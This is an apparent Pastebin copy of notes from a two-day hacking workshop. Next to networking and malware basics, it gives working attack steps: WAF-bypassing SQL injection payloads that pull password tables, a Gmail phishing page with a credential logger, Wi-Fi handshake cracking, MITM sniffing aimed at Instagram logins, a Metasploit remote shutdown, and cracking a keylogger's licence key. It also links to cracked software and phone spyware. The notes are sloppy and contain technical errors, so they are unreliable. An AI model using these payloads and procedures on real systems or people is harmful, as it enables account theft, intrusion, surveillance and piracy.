Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- fb.com/rahultyagiofficialpage
- instagram.com/iamrahultyagi
- twitter.com/rahultyagihacks
- Day 1 - LPU
- Introduction to Cyber Security
- Cyber Security is a part of IT eco system of an private organisation , Govt agencies and individual lifes.
- Threats for Banking Sectors
- -> Ransomwares
- -> DDOS Attacks
- -> Social Engineering Attacks
- -> Web Application Attacks
- -> SQL Injection
- Threats to the GOvt.
- -> National Security
- -> Critical Infrastructure
- Privacy to Citizens
- -> Identity Theft
- -> Critical Information Disclosure in Public
- -> For CSE -> Application + Network + Mobile
- -> For ECE -> Next Generation Secure Hardware Code
- -> Mechanical -> Aviation + Automobile
- -> Civil -> Smart cities
- -> Others
- Basics of Networking
- -> Network : Collection of devices with a common purpose of exchanging information and sharing perephiral devices known as a network.
- LAN MAN WAN PAN
- -> IP address : Its like your phone number
- Local IP : LAN and MAN
- Total : 255*255*255*255=????
- LAN and MAN
- 192.168.1.1
- 172.16.1.1
- 10.0.0.1
- Windows: cmd -> ipconfig
- Linux/Unix/Mac: -> terminal -> ifconfig
- Connection-specific DNS Suffix . : localdomain
- Link-local IPv6 Address . . . . . : fe80::c01f:cb7e
- IPv4 Address. . . . . . . . . . . : 192.168.235.198
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . : 192.168.235.2-> Mobile IP address
- Global IP : IP address given by the ISP to connect to the world.
- whatismyip.com
- -> Automated IP : Hotspot and Router Network
- -> Know Your IP Local and Global
- -> Privacy on Internet
- -> Secure Communication
- -> Secure Communication : Proxy and VPNs
- Web Based Proxy: WHen you use Website to change ur IP address.
- www.hidemyass.com
- www.kproxy.com
- www.ninjaproxy.com
- and so on...
- Standalone Proxy Servers
- When u use the application softwares to change the IP address by going to the non traditional port for the communication.
- Filters : Port 80,8080 or 443
- Bypass: Application-> 9999, 7777, or etc
- Ultra Surf 1.44MB
- Hotspot security shield
- Download: https://ultrasurf.us/
- VPNs:
- -> LPU VPN
- -> ProXPN
- -> TOR Network
- Watch Here : https://www.youtube.com/watch?v=DkEqWGF3cvg
- Cryptography and Steganography
- Cryptography takes care of two types of data.
- 1. residing data 2. Transit data
- Steganography : Where the goal of teh cryptography is to scrambled the data and information from the third part here the goal of the steganography is to HIDE the data from the third party.
- Information Gathering and Cyber Crime Tackling
- -> Email Tracing : Identifying Origin of Email
- Fake Emails:
- -> Email Websites : ekmei.cz
- -> Own PHP EMail Script for Fake Emails: github
- -> People Search + Information Gathering of People
- com.lullar.com --> People Email Searching
- -> jantakhoj.com : Gathering Intelectual information about any one any where.
- -> Shutting Down Illegal Websites and Blogs
- Information Gathering about website which is not available on the website.
- -> lpu.in
- whois.domaintools.com
- Email to : abuse@registrar.schlund.info
- Subject: Report Abuse to Domain ID: D425500000000413781-AGRS
- Body: Sir this website is hosting illegal content bla bla bla and infinity bla.
- Regards
- Bla Bla Brother
- -> IP address Tracing and Grabbing of Criminal
- -> www.whatstheirip.com
- -> www.fuglekos.com/ip-grabber/
- Link: https://goo.gl/UBr6wD
- IP address: 107.167.108.173
- iplocation.net : Find ISP Behind the IP address.
- -> Case Study : Jaipur College Confession Page - 2013
- Malwares
- -> Types of Malwares
- Virus : A code which infects systems and make them unstable in working.
- PS: A true virus cannot spread from one computer to another computer without human assitance.
- Worms : It can spread from one place to another without human assistance.
- Trojans : AKA RATs(Remote Accessing Tools) used to infect systems and then control overall functionaly of the system remotely from any where in the world.
- Adwares : malwares designed to trick users to click on ads and then generate money from clicks.
- - To get RID of these attacks get UBlock plugin in mozilla firefox.
- Ransomwares : Once infect your computer then encrypts the data with minimum 1024 bit encryption and then ask for money to get it back.
- Types:
- Tricky ransomwares : Children
- Direct ransomwares : Private Sector
- Spywares : Who spy and steal credentials like username password,credit card details and so on like chat and then black mail the person.
- Rootkits : Infects the ROm level of the os hence no one can detect it.
- Botnets : Millions of computers got infected by the criminal and they use it for teh DDOS attack.
- -> Basic Virus Code in Batch Scripting
- -> Trojans
- -> Types of Trojans
- Download: https://ufile.io/b07a1
- Protection from Malwares
- -----------------------
- 1. Viruses and Worms
- -> USB Disk Security
- 2. No Virus thanks exe radar pro
- Cyber Forensics
- -> Recovering data From HDD, Memory card, Pen Drives, Portabable HDD
- -> Easus data Recovery professional
- Download: https://ufile.io/cce751
- 1GB Pendrive: MB : 900MB
- Index Data Size
- 1010 setup.exe 100MB
- 1111 Movie720P.mp4 700MB
- -> Stellar Data Recovery: Data Recovery Software - Law Enforcement and Professional Nehru Place recovery Softwares
- System Hacking: Bypassing Login of Windows/ Linux/ Mac OS
- Linux :Bypassing Kali Linux Password
- Step 1: Select Recovery MODe Press E
- Step 2: Change ro to rw and add init=/bin/bash at the end of line and Press F10
- Step 3: Reset password by typing passwd root and press enter
- Step 4: Type new password and restart the system
- Bypassing Ubuntu System Password
- Step 1: Go to Safe mode
- Step 2: Recover Mode
- Step 3: Select the second last option from the list i.e SHELL
- Step 4: type passwd root
- Step 6: Give the new password and confirm password and restart the machine.
- Step 7: Fill the new password and enjoy :) .
- Windows: Cracking Windows Login Credentials
- 0-----------------------------------------0
- Windows Stores its password in hash format in a file known as SAM(Security Accounts Manager).
- C:/windows/system32/config/sam
- Active Password Changer
- Step 1: Hirenboot CD bootable
- Step 2: Boot it and select Boot into AERO Mode
- Step 3: Select Hiren BOOT CD Tools
- Step 4: Select 3rd option password changer
- Step 5: Select ACTIVE PASSWORD changer and remove ur hands from keypad.
- Step 6: Select 2nd option ms SAM file
- Step 7: Select the account which you want to reset
- Step 8: Change the password
- Step 9: Restart
- Step 10: No password is there Cheers!!! :)
- Day 2
- -----
- Email Hacking: Email hacking is a method or technique in which we trick the user with social engineering to enter his/her credentials mainly userid and password and then login into the account.
- There are many ways through which you can attack any email service.
- 1. Bad Passwords
- ->phone numbers -> 45%
- - char : rahul
- - numeric: 93333333
- - special:
- - complex: R@Hu7
- - Dictionary based Password: chair, donkey,temple,punjab
- - Pass Phrases aka Robust Password
- - *iG3sImG*
- 2. Phishing : Its a technique in which we make a fake clone page of any login panel and then trick the user to fill the details inside it , its not only related to passwords , these days criminals directly get credit card details and so on which can make money for them directly.
- 1. Simple Phishing
- 2. Spear Phishing
- 3. IDN Homograph Phishing
- 4. Vishing
- 5. Smishing
- Phishing
- --------
- 1. Gmail Fake Page
- 2. PHP Script
- 3. Logs.txt
- Making Computer As Server: XAMPP Server
- Download: apachefriends.org
- C:/xampp/htdocs/gmail
- Download Gmail: https://pastebin.com/XCn5WB9q
- Nokia.php: https://pastebin.com/QJ4pEUye
- email=rahul@gmail.com
- password=12345
- GET Method
- IDN Homograph Attack
- --------------------
- https://en.wikipedia.org/wiki/IDN_homograph_attack#Cyrillic
- "Deepika padukon and other using russian p"
- 2. Keyloggers
- -> Local Keylogger: Family Keylogger 0.22MB
- Download: http://www.spyarsenal.com/download.html
- Home Work-> Remote Keyloggers: Ardamax Keylogger - Paid
- Always use two step verification in gmail.
- Web Application Hacking and Security
- ------------------------------------
- OWASP Top 10 Attacks
- A1 Injection.
- A2 Broken Authentication and Session Management.
- A3 Cross-Site Scripting (XSS)
- A4 Insecure Direct Object References.
- A5 Security Misconfiguration.
- A6 Sensitive Data Exposure.
- A7 Missing Function Level Access Control.
- A8 Cross-Site Request Forgery (CSRF)
- A9 Unvalidated Redirects and Forwards
- A10 Using Component with KNown Vulnerabilities
- Google Dorks
- ------------
- search for required query of the sql in google "search google for syntax"
- Injections: SQL Injection
- -------------------------
- Webiste: Collection of webpages known as website.
- Static Websites: When website is designed in pure HTML and having no database attach to it then we can say its a pure static site mainly in read only mode.
- Dynamic Websites: When website carry so many user interaction points from where user can send the data or information inside the website with teh help of database connectivity we can say this is a dynamic website.
- For Example: FB and Gmail.com etc.
- Attacking Websites from Google Dorks
- --------------------------------------
- Getting the Critical Information Holding databases from Google.
- Title : Blue
- URL : Green
- Content : Black
- Every website take care of the dump of the SQL file as a backup everyday.
- SQL Injection: When we send malicious sql code to the website and try to execute in teh database for any desired output.
- username=?
- password=?
- Login
- select * from users where username='?''or'1'='1 and password='?''or'1'='1
- 'or'1'='1
- How to attack and test security for webistes which are protected from Simple SQL Injection and Also Backed up by Web Application Firewalls Designed to protect from hackers.
- Target : target.com (Example)
- Attack Auditing: Advance SQL Injection with WAF Bypassing
- Step 1: multan.gov.pk . FInd any GET method in the URL of the website.
- GET METHOD : .php?id=10
- POST METHOD : .php
- Step 2: Check the validation and Exception Handling of the website URL
- target.com/files.php?id=1'
- Step 3: Check the total number of Columns are there except ID.
- target.com/files.php?id=1 order by 1--+
- Step 4: Dump the structure of the two columns on teh right handside.
- target.com/files.php?id=1 union select 1,2--+
- Attack 1 to Bypass : Upper Lower Case Injection
- UnIoN sElEcT
- target.com/files.php?id=1 /*!UnIoN*/+/*!sElEcT*/ 1,2--+
- Attack 2
- --------
- Inline Execution Comments
- /*UnIoN*/+/*!sElEcT*/
- Attack 3
- --------
- Version Based Inline Executable Comments
- MY-SQL VERSIONS
- 5.00.00 When We type in URL : 50000
- 4.00.00 When We type in URL : 40000
- 3.00.00 When We type in URL : 30000
- 2.00.00 When We type in URL : 20000
- 1.00.00 When We type in URL : 10000
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,database()--+
- Database --> Tables -> Columns/ROws -> data
- Get the Tables
- schema: In the database schema holds the responsibility to take care of the entire structure of the database.
- Information of all the tables i.e Index
- Information of all the columns i.e Index
- Table: information_schema.tables
- Columns: information_schema.columns
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+
- Target Table: users
- Get the columns of the users table
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+
- Get the login and password
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,password from users--+
- Security Tips for Developers
- ------------------------------
- 1. Always use Escape Character Validation at client side and server side.
- 2. Do not use GET methods on requests in website
- 3. Always use stored procedures
- 4. Never accept special character in the login fields or any other fields of the website.
- 5. Do see OWASP TOP 10 attacks security gudielines before starting a new development project. Via owasp.org
- Wifi Hacking and Security
- -------------------------
- WiFI stands for Wireless Fidelity. Works on 802.11a protocol onwards.
- Security
- --------
- WEP , WPA and WPA-2 PSK Authentication
- WEP stands for Wired Equivalent Privacy. It is 802.11's first hardware form of security where the user and WAP are configured with an encryption key of either 64 bits or 128 bits in HEX. It works in this way that when the user attempts to authenticate, the AP issues a random challenge. The user then returns the challenge, encrypted with the key and the AP decrypts this challenge and if it matches the original the client is authenticated otherwise not. The problem with WEP is that the key is static, which is vulnerable, means by using some tools a hacker could use reverse-engineering to extract the encryption key. This process affects the transmission speed.
- WPA stands for WiFi Protected Access. It builds upon WEP, to make it more secure by adding extra security mechanism and algorithms to stop unauthorized access. WPA delivers a level of security way beyond anything that WEP can offer. WiFi compliance ensures interoperability between different manufacturer’s equipment. WPA bridges the gap between WEP and 802.11i networks, and has the advantage that the firmware in older equipment may be upgradeable. It's a new security standard adopted by the WiFi Alliance consortium.
- WPA2 is similar to WPA, except one thing that it add extra encryption called AES-CCMP. The primary difference between WPA and WPA2 is that WPA2 uses a more advanced encryption technique called AES (Advanced Encryption Standard), allowing for compliance with FIPS140-2 government security requirements. We prefer WPA2 because it has more than three protection levels, making it nearly impossible for computer guru hackers to break the encryption. AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based upon the Institute for Electrical and Electronics Engineers’ (IEEE) 802.11i amendment to the 802.11 standard, which was modified on July 29, 2004.
- To Attack and Test the Wifi Security
- -----------------------------------
- 1. Kali Linux OS www.kali.org 2.0 onwards
- 2.TPLINK Exeternal Wifi Adapter:http://dl.flipkart.com/dl/tp-link-tl-wn722n-150mbps-high-gain-wireless-usb-adapter/p/itmdzusgbtfhhadq?pid=USBDZUSDGUZBGBXR&affid=officialra
- 3.airmon-ng : This application is used to detect the hardware of the card.
- 4. airodump-ng : This will help you to select and target a particular wireless hotspot which we want to hack.
- 5. aircrack-ng : After capturing the KEY of wifi we have to decrypt it or crack it with the help of aircrack-ng.
- rahul-->!@#$%
- !@#$% -> X Decrypt this into Rahul gain.
- Good News
- We know the algorithm which convert text into hash.
- !@#$% !@#$% <--rahul<-- Dictionary 70%
- pankaj
- gaurav
- hello
- rahul
- Path : usr/share/wordlists/rockyou.txt.gz
- steps for hacking wifi with kali
- steps -> to check if wifi is able for hacking , , open "airmon-ng" in terminal
- -> type "airmon-ng start wlan0"
- -> kill if some PID s are giving problems
- -> "kill 2798 " or error you have
- -> "clear" to clear the screen
- -> type "airodump-ng mon 0 " to dump files
- -> copy mac id and channle number an type "airodump-ng --bssid 'enter mac id' -c 'channle number' -w key mon0 "
- -> then press ctrl +z to stop capturing and find key in home>key-01.cap
- -> the key will be in one way algorithm
- -> open dictionary at"usr/share/wordlists/rockyou.txt.gz"
- -> type this to extract rockyou.txt.gz "sgunzip rockyou.txt.gz" but select file first from desktop or wherever the file is
- -> type to compare "aircrack-ng key-01.cap -w rockyou.txt"
- -> password will be show and wifi handshake should must come in the beginning where we are capturing data.
- steps for creating fake hotspot
- steps -> start ettercap-G
- -> start unified sniffing
- -> select your wifi
- -> select hosts
- -> scan for hosts
- -> select host list
- -> select adapter as target one and other as target 2
- -> go to mitm and opnremote connectoin >sniff
- -> start>start snifffing
- -> urlsnarf -1 wlan0
- -> start driftnet
- to hack insta use
- -> bettercap
- -> bettercap -I wlan0 --proxy -P POST
- using (metasploit) to shut down other pc on same network remotely
- steps -> msfconsole
- -> search maxchannel
- -> use "auxilll...........lids"
- -> show options
- -> nmap 'ip' to check if any of the victims port is open */
- -> set RHOST 'ip'
- -> show options
- -> exploit
- Game Hacking
- ------------
- Game Download: https://ufile.io/926c6
- Cheat Engine Download: https://ufile.io/c2c932
- Reverse Engineering: Cracking Applications
- ------------------------------------------
- software cracking
- use windows xp 32 bit
- Software : olly dbg
- Target : Perfect Keylogger
- Price: $49 Approx
- Download: http://www.blazingtools.com/downloads.html
- Steps
- ->start olly dbg
- ->close all windows
- ->file>open>exe file of application
- ->assmbly code of exe will show up
- ->view>executable module or alt+e
- ->look for name of app or something related to it and double click on it
- ->right click>search for all refrence text strings
- ->search for messsage ,which application shows up at the beginning to enter the code
- ->double click on line or message
- ->a black line is coming on left <it means a function . and if the message is at the end , go with the black line to the top to find the stuff in function
- ->now put a break ppoint in starting of this function using f2
- ->a red line shows a break line is applied
- -> now run the program using play.
- ->now enter your name and key 'fake one'
- ->red line will change into black and application will pause .
- -> execute the line one by one using f8 and keep a look at the output in console window
- ->then two keys will appear in lower outputs and first one will be ours and second one will be the original one ,
- ->now copy the new key , exit the application
- ->open app , enter same username you used earlier and paste the copied key.
- Mobile Hacking
- --------------
- 1. Android Deleted Whatsapp,Skype Chat Recovery | Bypassing Lock Screen
- Download:https://tinyurl.com/htm42kd
- Crack: http://www94.zippyshare.com/v/4S8Dw8VW/file.html
- LUCIDROID
- airdroid
- spyhuman"looks nice and is free"
- TruthSPY
- Spy2Mobile
- MaxSpy
- Overcraft
- 2. Rooting : King Root.apk
- Jailbreaking : Pangu and Taiji Jailbreak
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement